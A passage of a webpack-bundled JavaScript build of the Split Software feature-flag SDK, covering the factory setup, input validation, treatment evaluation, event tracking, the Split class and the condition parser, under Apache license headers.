/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__client__ = __webpack_require__(1280);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__metrics__ = __webpack_require__(2835);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__events__ = __webpack_require__(2849);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__sync__ = __webpack_require__(2850);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__listeners__ = __webpack_require__(2878);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils_inputValidation__ = __webpack_require__(202);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__utils_constants__ = __webpack_require__(56);







 // map of authorizationKeys to syncManagers, to keep a single instance per factory and needed to create shared clients

var syncManagers = {}; //
// Create SDK instance based on the provided configurations
//

function SplitFactoryOnline(context, readyTrackers, mainClientMetricCollectors) {
  var sharedInstance = !!mainClientMetricCollectors;
  var settings = context.get(context.constants.SETTINGS);
  var readiness = context.get(context.constants.READINESS);
  var storage = context.get(context.constants.STORAGE);
  var statusManager = context.get(context.constants.STATUS_MANAGER); // We are only interested in exposable EventEmitter

  var gate = readiness.gate,
      splits = readiness.splits,
      segments = readiness.segments; // Events name

  var SDK_READY = gate.SDK_READY; // Shared instances use parent metrics collectors

  var metrics = sharedInstance ? undefined : Object(__WEBPACK_IMPORTED_MODULE_2__metrics__["a" /* default */])(context); // Shared instances use parent events queue

  var events = sharedInstance ? undefined : Object(__WEBPACK_IMPORTED_MODULE_3__events__["a" /* default */])(context);
  var syncManager;

  switch (settings.mode) {
    case __WEBPACK_IMPORTED_MODULE_7__utils_constants__["i" /* PRODUCER_MODE */]:
    case __WEBPACK_IMPORTED_MODULE_7__utils_constants__["m" /* STANDALONE_MODE */]:
      {
        context.put(context.constants.COLLECTORS, metrics && metrics.collectors); // We don't fully instantiate syncManager if we are creating a shared instance.

        if (sharedInstance) {
          syncManager = syncManagers[settings.core.authorizationKey].shared(context);
        } else {
          syncManager = Object(__WEBPACK_IMPORTED_MODULE_4__sync__["a" /* default */])(context);
          syncManagers[settings.core.authorizationKey] = syncManager;
        }

        break;
      }

    case __WEBPACK_IMPORTED_MODULE_7__utils_constants__["a" /* CONSUMER_MODE */]:
      {
        context.put(context.constants.READY_FROM_CACHE, true); // For SDK inner workings it's supposed to be ready from cache.

        break;
      }
  } // Signal listener only needed for main instances


  var signalsListener = sharedInstance ? undefined : new __WEBPACK_IMPORTED_MODULE_5__listeners__["a" /* default */](context, syncManager);

  if (readyTrackers && syncManager && !sharedInstance) {
    // Only track ready events for non-shared and non-consumer clients
    var sdkReadyTracker = readyTrackers.sdkReadyTracker,
        splitsReadyTracker = readyTrackers.splitsReadyTracker,
        segmentsReadyTracker = readyTrackers.segmentsReadyTracker; // Defered setup of collectors for this task, as it is the only ready latency we store on BE.

    sdkReadyTracker.setCollectorForTask(metrics.collectors);
    gate.once(SDK_READY, sdkReadyTracker);
    splits.once(splits.SDK_SPLITS_ARRIVED, splitsReadyTracker);
    segments.once(segments.SDK_SEGMENTS_ARRIVED, segmentsReadyTracker);
  } // Start background jobs tasks


  syncManager && syncManager.start();
  metrics && metrics.start();
  events && context.put(context.constants.EVENTS, events) && events.start(); // If no collectors are stored we are on a shared instance, save main one.

  context.put(context.constants.COLLECTORS, mainClientMetricCollectors);
  var api = __WEBPACK_IMPORTED_MODULE_0_object_assign___default()( // Proto linkage of the EventEmitter to prevent any change
  Object.create(statusManager), // getTreatment/s & track
  Object(__WEBPACK_IMPORTED_MODULE_1__client__["a" /* default */])(context), // Utilities
  {
    // Destroy instance
    destroy: function destroy() {
      // Stop background jobs
      syncManager && syncManager.stop();
      metrics && metrics.stop();
      events && events.stop(); // Send impressions and events in parallel.

      return Promise.all([metrics && metrics.flush(), events && events.flush()]).then(function () {
        // Cleanup event listeners
        readiness.destroy();
        signalsListener && signalsListener.stop(); // Cleanup storage

        storage.destroy && storage.destroy(); // Mark the factory as destroyed.

        context.put(context.constants.DESTROYED, true); // And release the API Key and SyncManager

        if (!sharedInstance) {
          Object(__WEBPACK_IMPORTED_MODULE_6__utils_inputValidation__["a" /* releaseApiKey */])(settings.core.authorizationKey);
          delete syncManagers[settings.core.authorizationKey];
        }
      });
    }
  }); // We'll start the signals listener if the client is not a shared instance.
  // For now, we will only call destroy.

  !sharedInstance && signalsListener.start(api.destroy);
  return {
    api: api,
    metricCollectors: metrics && metrics.collectors
  };
}

/* harmony default export */ __webpack_exports__["a"] = (SplitFactoryOnline);

/***/ }),
/* 2790 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__client__ = __webpack_require__(2791);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__ = __webpack_require__(202);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_constants__ = __webpack_require__(56);





/**
 * We will validate the input before actually executing the client methods. We should "guard" the client here,
 * while not polluting the "real" implementation of those methods.
 */

function ClientInputValidationLayer(context, isKeyBinded, isTTBinded) {
  var settings = context.get(context.constants.SETTINGS);
  var isStorageSync = settings.storage.type !== __WEBPACK_IMPORTED_MODULE_4__utils_constants__["p" /* STORAGE_REDIS */]; // instantiate the client

  var client = Object(__WEBPACK_IMPORTED_MODULE_1__client__["a" /* default */])(context); // Keep a reference to the original methods

  var clientGetTreatment = client.getTreatment;
  var clientGetTreatmentWithConfig = client.getTreatmentWithConfig;
  var clientGetTreatments = client.getTreatments;
  var clientGetTreatmentsWithConfig = client.getTreatmentsWithConfig;
  var clientTrack = client.track;
  /**
   * Avoid repeating this validations code
   */

  function validateEvaluationParams(maybeKey, maybeSplitOrSplits, maybeAttributes, methodName) {
    var multi = Object(__WEBPACK_IMPORTED_MODULE_3__utils_lang__["o" /* startsWith */])(methodName, 'getTreatments');
    var key = isKeyBinded ? maybeKey : Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["i" /* validateKey */])(maybeKey, methodName);
    var splitOrSplits = multi ? Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["l" /* validateSplits */])(maybeSplitOrSplits, methodName) : Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["j" /* validateSplit */])(maybeSplitOrSplits, methodName);
    var attributes = Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["c" /* validateAttributes */])(maybeAttributes, methodName);
    var isOperational = Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["g" /* validateIfDestroyed */])(context);
    Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["h" /* validateIfReady */])(context, methodName);
    var valid = isOperational && key && splitOrSplits && attributes !== false;
    return {
      valid: valid,
      key: key,
      splitOrSplits: splitOrSplits,
      attributes: attributes
    };
  }

  client.getTreatment = function getTreatment(maybeKey, maybeSplit, maybeAttributes) {
    var params = validateEvaluationParams(maybeKey, maybeSplit, maybeAttributes, 'getTreatment');

    if (params.valid) {
      return clientGetTreatment(params.key, params.splitOrSplits, params.attributes);
    } else {
      if (isStorageSync) return __WEBPACK_IMPORTED_MODULE_4__utils_constants__["b" /* CONTROL */];
      return Promise.resolve(__WEBPACK_IMPORTED_MODULE_4__utils_constants__["b" /* CONTROL */]);
    }
  };

  client.getTreatmentWithConfig = function getTreatmentWithConfig(maybeKey, maybeSplit, maybeAttributes) {
    var params = validateEvaluationParams(maybeKey, maybeSplit, maybeAttributes, 'getTreatmentWithConfig');

    if (params.valid) {
      return clientGetTreatmentWithConfig(params.key, params.splitOrSplits, params.attributes);
    } else {
      if (isStorageSync) return __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, __WEBPACK_IMPORTED_MODULE_4__utils_constants__["c" /* CONTROL_WITH_CONFIG */]);
      return Promise.resolve(__WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, __WEBPACK_IMPORTED_MODULE_4__utils_constants__["c" /* CONTROL_WITH_CONFIG */]));
    }
  };

  client.getTreatments = function getTreatments(maybeKey, maybeSplits, maybeAttributes) {
    var params = validateEvaluationParams(maybeKey, maybeSplits, maybeAttributes, 'getTreatments');

    if (params.valid) {
      return clientGetTreatments(params.key, params.splitOrSplits, params.attributes);
    } else {
      var res = {};
      if (params.splitOrSplits) params.splitOrSplits.forEach(function (split) {
        return res[split] = __WEBPACK_IMPORTED_MODULE_4__utils_constants__["b" /* CONTROL */];
      });
      if (isStorageSync) return res;
      return Promise.resolve(res);
    }
  };

  client.getTreatmentsWithConfig = function getTreatmentsWithConfig(maybeKey, maybeSplits, maybeAttributes) {
    var params = validateEvaluationParams(maybeKey, maybeSplits, maybeAttributes, 'getTreatmentsWithConfig');

    if (params.valid) {
      return clientGetTreatmentsWithConfig(params.key, params.splitOrSplits, params.attributes);
    } else {
      var res = {};
      if (params.splitOrSplits) params.splitOrSplits.forEach(function (split) {
        return res[split] = __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, __WEBPACK_IMPORTED_MODULE_4__utils_constants__["c" /* CONTROL_WITH_CONFIG */]);
      });
      if (isStorageSync) return res;
      return Promise.resolve(res);
    }
  };

  client.track = function track(maybeKey, maybeTT, maybeEvent, maybeEventValue, maybeProperties) {
    var key = isKeyBinded ? maybeKey : Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["i" /* validateKey */])(maybeKey, 'track');
    var tt = isTTBinded ? maybeTT : Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["m" /* validateTrafficType */])(maybeTT, 'track');
    var event = Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["d" /* validateEvent */])(maybeEvent, 'track');
    var eventValue = Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["f" /* validateEventValue */])(maybeEventValue, 'track');

    var _validateEventPropert = Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["e" /* validateEventProperties */])(maybeProperties, 'track'),
        properties = _validateEventPropert.properties,
        size = _validateEventPropert.size;

    var isOperational = Object(__WEBPACK_IMPORTED_MODULE_2__utils_inputValidation__["g" /* validateIfDestroyed */])(context);

    if (isOperational && key && tt && event && eventValue !== false && properties !== false) {
      return clientTrack(key, tt, event, eventValue, properties, size);
    } else {
      if (isStorageSync) return false;
      return Promise.resolve(false);
    }
  };

  return client;
}

/* harmony default export */ __webpack_exports__["a"] = (ClientInputValidationLayer);

/***/ }),
/* 2791 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__engine_evaluator__ = __webpack_require__(2792);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__trackers_impressions__ = __webpack_require__(2827);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__trackers_event__ = __webpack_require__(2834);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_timeTracker__ = __webpack_require__(278);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils_key_factory__ = __webpack_require__(492);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__utils_inputValidation__ = __webpack_require__(202);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__utils_labels__ = __webpack_require__(277);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__utils_constants__ = __webpack_require__(56);

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-client');






/* asynchronous validations that live on the client. */





function ClientFactory(context) {
  var storage = context.get(context.constants.STORAGE);
  var metricCollectors = context.get(context.constants.COLLECTORS);
  var impressionsTracker = Object(__WEBPACK_IMPORTED_MODULE_2__trackers_impressions__["a" /* default */])(context);
  var eventTracker = Object(__WEBPACK_IMPORTED_MODULE_3__trackers_event__["a" /* default */])(context);

  function getTreatment(key, splitName, attributes, withConfig) {
    if (withConfig === void 0) {
      withConfig = false;
    }

    var taskToBeTracked = __WEBPACK_IMPORTED_MODULE_4__utils_timeTracker__["a" /* default */].TaskNames[withConfig ? 'SDK_GET_TREATMENT_WITH_CONFIG' : 'SDK_GET_TREATMENT'];
    var stopLatencyTracker = __WEBPACK_IMPORTED_MODULE_4__utils_timeTracker__["a" /* default */].start(taskToBeTracked, metricCollectors);
    var evaluation = Object(__WEBPACK_IMPORTED_MODULE_1__engine_evaluator__["a" /* evaluateFeature */])(key, splitName, attributes, storage);

    var wrapUp = function wrapUp(evaluationResult) {
      var treatment = processEvaluation(evaluationResult, splitName, key, attributes, withConfig, "getTreatment" + (withConfig ? 'withConfig' : ''));
      impressionsTracker.track();
      stopLatencyTracker();
      return treatment;
    };

    return Object(__WEBPACK_IMPORTED_MODULE_5__utils_promise_thenable__["a" /* default */])(evaluation) ? evaluation.then(function (res) {
      return wrapUp(res);
    }) : wrapUp(evaluation);
  }

  function getTreatmentWithConfig(key, splitName, attributes) {
    return getTreatment(key, splitName, attributes, true);
  }

  function getTreatments(key, splitNames, attributes, withConfig) {
    if (withConfig === void 0) {
      withConfig = false;
    }

    var taskToBeTracked = __WEBPACK_IMPORTED_MODULE_4__utils_timeTracker__["a" /* default */].TaskNames[withConfig ? 'SDK_GET_TREATMENTS_WITH_CONFIG' : 'SDK_GET_TREATMENTS'];
    var stopLatencyTracker = __WEBPACK_IMPORTED_MODULE_4__utils_timeTracker__["a" /* default */].start(taskToBeTracked, metricCollectors);

    var wrapUp = function wrapUp(evaluationResults) {
      var results = {};
      Object.keys(evaluationResults).forEach(function (splitName) {
        results[splitName] = processEvaluation(evaluationResults[splitName], splitName, key, attributes, withConfig, "getTreatments" + (withConfig ? 'withConfig' : ''));
      });
      impressionsTracker.track();
      stopLatencyTracker();
      return results;
    };

    var evaluations = Object(__WEBPACK_IMPORTED_MODULE_1__engine_evaluator__["b" /* evaluateFeatures */])(key, splitNames, attributes, storage);
    return Object(__WEBPACK_IMPORTED_MODULE_5__utils_promise_thenable__["a" /* default */])(evaluations) ? evaluations.then(function (res) {
      return wrapUp(res);
    }) : wrapUp(evaluations);
  }

  function getTreatmentsWithConfig(key, splitNames, attributes) {
    return getTreatments(key, splitNames, attributes, true);
  } // Internal function


  function processEvaluation(evaluation, splitName, key, attributes, withConfig, invokingMethodName) {
    var isSdkReady = context.get(context.constants.READY, true) || context.get(context.constants.READY_FROM_CACHE, true);
    var matchingKey = Object(__WEBPACK_IMPORTED_MODULE_6__utils_key_factory__["b" /* matching */])(key);
    var bucketingKey = Object(__WEBPACK_IMPORTED_MODULE_6__utils_key_factory__["a" /* bucketing */])(key); // If the SDK was not ready, treatment may be incorrect due to having Splits but not segments data.

    if (!isSdkReady) {
      evaluation = {
        treatment: __WEBPACK_IMPORTED_MODULE_9__utils_constants__["b" /* CONTROL */],
        label: __WEBPACK_IMPORTED_MODULE_8__utils_labels__["d" /* SDK_NOT_READY */]
      };
    }

    var _evaluation = evaluation,
        treatment = _evaluation.treatment,
        label = _evaluation.label,
        changeNumber = _evaluation.changeNumber,
        _evaluation$config = _evaluation.config,
        config = _evaluation$config === void 0 ? null : _evaluation$config;
    log.info("Split: " + splitName + ". Key: " + matchingKey + ". Evaluation: " + treatment + ". Label: " + label);

    if (Object(__WEBPACK_IMPORTED_MODULE_7__utils_inputValidation__["k" /* validateSplitExistance */])(context, splitName, label, invokingMethodName)) {
      log.info('Queueing corresponding impression.');
      impressionsTracker.queue({
        feature: splitName,
        keyName: matchingKey,
        treatment: treatment,
        time: Date.now(),
        bucketingKey: bucketingKey,
        label: label,
        changeNumber: changeNumber
      }, attributes);
    }

    if (withConfig) {
      return {
        treatment: treatment,
        config: config
      };
    }

    return treatment;
  }

  function track(key, trafficTypeName, eventTypeId, value, properties, size) {
    if (value === void 0) {
      value = null;
    }

    if (properties === void 0) {
      properties = null;
    }

    if (size === void 0) {
      size = 1024;
    }

    var matchingKey = Object(__WEBPACK_IMPORTED_MODULE_6__utils_key_factory__["b" /* matching */])(key);
    var timestamp = Date.now();
    var eventData = {
      eventTypeId: eventTypeId,
      trafficTypeName: trafficTypeName,
      value: value,
      timestamp: timestamp,
      key: matchingKey,
      properties: properties
    }; // This may be async but we only warn, we don't actually care if it is valid or not in terms of queueing the event.

    Object(__WEBPACK_IMPORTED_MODULE_7__utils_inputValidation__["n" /* validateTrafficTypeExistance */])(trafficTypeName, context, 'track');
    return eventTracker.track(eventData, size);
  }

  return {
    getTreatment: getTreatment,
    getTreatmentWithConfig: getTreatmentWithConfig,
    getTreatments: getTreatments,
    getTreatmentsWithConfig: getTreatmentsWithConfig,
    track: track
  };
}

/* harmony default export */ __webpack_exports__["a"] = (ClientFactory);

/***/ }),
/* 2792 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = evaluateFeature;
/* harmony export (immutable) */ __webpack_exports__["b"] = evaluateFeatures;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0____ = __webpack_require__(2793);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_labels__ = __webpack_require__(277);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_constants__ = __webpack_require__(56);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/





var treatmentException = {
  treatment: __WEBPACK_IMPORTED_MODULE_4__utils_constants__["b" /* CONTROL */],
  label: __WEBPACK_IMPORTED_MODULE_2__utils_labels__["a" /* EXCEPTION */],
  config: null
};
function evaluateFeature(key, splitName, attributes, storage) {
  var stringifiedSplit;

  try {
    stringifiedSplit = storage.splits.getSplit(splitName);
  } catch (e) {
    // the only scenario where getSplit can throw an error is when the storage
    // is redis and there is a connection issue and we can't retrieve the split
    // to be evaluated
    return Promise.resolve(treatmentException);
  }

  if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(stringifiedSplit)) {
    return stringifiedSplit.then(function (result) {
      return getEvaluation(result, key, attributes, storage);
    });
  }

  return getEvaluation(stringifiedSplit, key, attributes, storage);
}
function evaluateFeatures(key, splitNames, attributes, storage) {
  var stringifiedSplits;
  var evaluations = {};

  try {
    stringifiedSplits = storage.splits.fetchMany(splitNames);
  } catch (e) {
    // the only scenario where fetchMany can throw an error is when the storage
    // is redis and there is a connection issue and we can't retrieve the split
    // to be evaluated
    splitNames.forEach(function (splitName) {
      evaluations[splitName] = treatmentException;
    });
    return Promise.resolve(evaluations);
  }

  return Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(stringifiedSplits) ? stringifiedSplits.then(function (splits) {
    return getEvaluations(splitNames, splits, key, attributes, storage);
  }) : getEvaluations(splitNames, stringifiedSplits, key, attributes, storage);
}

function getEvaluation(stringifiedSplit, key, attributes, storage) {
  var evaluation = {
    treatment: __WEBPACK_IMPORTED_MODULE_4__utils_constants__["b" /* CONTROL */],
    label: __WEBPACK_IMPORTED_MODULE_2__utils_labels__["g" /* SPLIT_NOT_FOUND */],
    config: null
  };

  if (stringifiedSplit) {
    var splitJSON = JSON.parse(stringifiedSplit);
    var split = __WEBPACK_IMPORTED_MODULE_0____["a" /* default */].parse(splitJSON, storage);
    evaluation = split.getTreatment(key, attributes, evaluateFeature); // If the storage is async, evaluation and changeNumber will return a thenable

    if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(evaluation)) {
      return evaluation.then(function (result) {
        result.changeNumber = split.getChangeNumber();
        result.config = Object(__WEBPACK_IMPORTED_MODULE_3__utils_lang__["e" /* get */])(splitJSON, "configurations." + result.treatment, null);
        return result;
      });
    } else {
      evaluation.changeNumber = split.getChangeNumber(); // Always sync and optional

      evaluation.config = Object(__WEBPACK_IMPORTED_MODULE_3__utils_lang__["e" /* get */])(splitJSON, "configurations." + evaluation.treatment, null);
    }
  }

  return evaluation;
}

function getEvaluations(splitNames, splits, key, attributes, storage) {
  var result = {};
  var thenables = [];
  splitNames.forEach(function (splitName) {
    var evaluation = getEvaluation(splits[splitName], key, attributes, storage);

    if (Object(__WEBPACK_IMPORTED_MODULE_1__utils_promise_thenable__["a" /* default */])(evaluation)) {
      thenables.push(evaluation.then(function (res) {
        result[splitName] = res;
      }));
    } else {
      result[splitName] = evaluation;
    }
  });
  return thenables.length > 0 ? Promise.all(thenables).then(function () {
    return result;
  }) : result;
}

/***/ }),
/* 2793 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__parser__ = __webpack_require__(2794);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_key_parser__ = __webpack_require__(1279);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils_promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__utils_labels__ = __webpack_require__(277);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__utils_constants__ = __webpack_require__(56);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/








function defaults(inst) {
  // in case we don't have a default treatment in the instanciation, use 'control'
  if (typeof inst.baseInfo.defaultTreatment !== 'string') {
    inst.baseInfo.defaultTreatment = __WEBPACK_IMPORTED_MODULE_6__utils_constants__["b" /* CONTROL */];
  }
}

function evaluationResult(result, defaultTreatment) {
  return {
    treatment: Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["e" /* get */])(result, 'treatment', defaultTreatment),
    label: Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["e" /* get */])(result, 'label', __WEBPACK_IMPORTED_MODULE_5__utils_labels__["c" /* NO_CONDITION_MATCH */])
  };
}

function Split(baseInfo, evaluator) {
  if (!(this instanceof Split)) {
    return new Split(baseInfo, evaluator);
  }

  this.baseInfo = baseInfo;
  this.evaluator = evaluator;
  defaults(this);
}

Split.parse = function parse(splitFlatStructure, storage) {
  var conditions = splitFlatStructure.conditions;
  var evaluator = Object(__WEBPACK_IMPORTED_MODULE_2__parser__["a" /* default */])(conditions, storage);
  return new Split(__WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, splitFlatStructure), evaluator);
};

Split.prototype.getKey = function getKey() {
  return this.baseInfo.name;
};

Split.prototype.getTreatment = function getTreatment(key, attributes, splitEvaluator) {
  var _this$baseInfo = this.baseInfo,
      killed = _this$baseInfo.killed,
      seed = _this$baseInfo.seed,
      defaultTreatment = _this$baseInfo.defaultTreatment,
      trafficAllocation = _this$baseInfo.trafficAllocation,
      trafficAllocationSeed = _this$baseInfo.trafficAllocationSeed,
      algo = _this$baseInfo.algo;
  var parsedKey;
  var treatment;
  var label;

  try {
    parsedKey = Object(__WEBPACK_IMPORTED_MODULE_3__utils_key_parser__["a" /* default */])(key);
  } catch (err) {
    return {
      treatment: __WEBPACK_IMPORTED_MODULE_6__utils_constants__["b" /* CONTROL */],
      label: __WEBPACK_IMPORTED_MODULE_5__utils_labels__["a" /* EXCEPTION */]
    };
  }

  if (this.isGarbage()) {
    treatment = __WEBPACK_IMPORTED_MODULE_6__utils_constants__["b" /* CONTROL */];
    label = __WEBPACK_IMPORTED_MODULE_5__utils_labels__["e" /* SPLIT_ARCHIVED */];
  } else if (killed) {
    treatment = defaultTreatment;
    label = __WEBPACK_IMPORTED_MODULE_5__utils_labels__["f" /* SPLIT_KILLED */];
  } else {
    var evaluation = this.evaluator(parsedKey, seed, trafficAllocation, trafficAllocationSeed, attributes, algo, splitEvaluator); // Evaluation could be async, so we should handle that case checking for a
    // thenable object

    if (Object(__WEBPACK_IMPORTED_MODULE_4__utils_promise_thenable__["a" /* default */])(evaluation)) {
      return evaluation.then(function (result) {
        return evaluationResult(result, defaultTreatment);
      });
    } else {
      return evaluationResult(evaluation, defaultTreatment);
    }
  }

  return {
    treatment: treatment,
    label: label
  };
};

Split.prototype.isGarbage = function isGarbage() {
  return this.baseInfo.status === 'ARCHIVED';
};

Split.prototype.getChangeNumber = function getChangeNumber() {
  return this.baseInfo.changeNumber;
};

/* harmony default export */ __webpack_exports__["a"] = (Split);

/***/ }),
/* 2794 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__transforms_matchers__ = __webpack_require__(2795);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__treatments__ = __webpack_require__(2800);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__matchers__ = __webpack_require__(2801);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__value__ = __webpack_require__(2819);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__condition__ = __webpack_require__(2821);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__combiners_ifelseif__ = __webpack_require__(2825);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__combiners_and__ = __webpack_require__(2826);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__utils_promise_thenable__ = __webpack_require__(75);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/









function parse(conditions, storage) {
  var predicates = [];

  for (var i = 0; i < conditions.length; i++) {
    var _conditions$i = conditions[i],
        matchers = _conditions$i.matcherGroup.matchers,
        partitions = _conditions$i.partitions,
        label = _conditions$i.label,
        conditionType = _conditions$i.conditionType; // transform data structure

    matchers = Object(__WEBPACK_IMPORTED_MODULE_0__transforms_matchers__["a" /* default */])(matchers); // create a set of pure functions from the matcher's dto

    var expressions = matchers.map(function (matcherDto) {
      var matcher = Object(__WEBPACK_IMPORTED_MODULE_2__matchers__["a" /* default */])(matcherDto, storage); // Evaluator function.

      return function (key, attributes, splitEvaluator) {
        var value = Object(__WEBPACK_IMPORTED_MODULE_3__value__["a" /* default */])(key, matcherDto, attributes);
        var result = value !== undefined ? matcher(value, splitEvaluator) : false;

        if (Object(__WEBPACK_IMPORTED_MODULE_7__utils_promise_thenable__["a" /* default */])(result)) {
          return result.then(function (res) {
            return Boolean(res ^ matcherDto.negate);
          });
        }

        return Boolean(result ^ matcherDto.negate);
      };
    }); // if matcher's factory can't instanciate the matchers, the expressions array
    // will be empty

    if (expressions.length === 0) {
      // reset any data collected during parsing
      predicates = []; // and break the loop

      break;
    }

    predicates.push(Object(__WEBPACK_IMPORTED_MODULE_4__condition__["a" /* default */])(Object(__WEBPACK_IMPORTED_MODULE_6__combiners_and__["a" /* default */])(expressions), __WEBPACK_IMPORTED_MODULE_1__treatments__["a" /* default */].parse(partitions), label, conditionType));
  } // Instanciate evaluator given the set of conditions using if else if logic


  return Object(__WEBPACK_IMPORTED_MODULE_5__combiners_ifelseif__["a" /* default */])(predicates);
}

/* harmony default export */ __webpack_exports__["a"] = (parse);

/***/ }),
/* 2795 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__matchers_types__ = __webpack_require__(698);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__segment__ = __webpack_require__(2796);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__whitelist__ = __webpack_require__(2797);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__set__ = __webpack_require__(2798);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__unaryNumeric__ = __webpack_require__(2799);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__convertions__ = __webpack_require__(1282);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
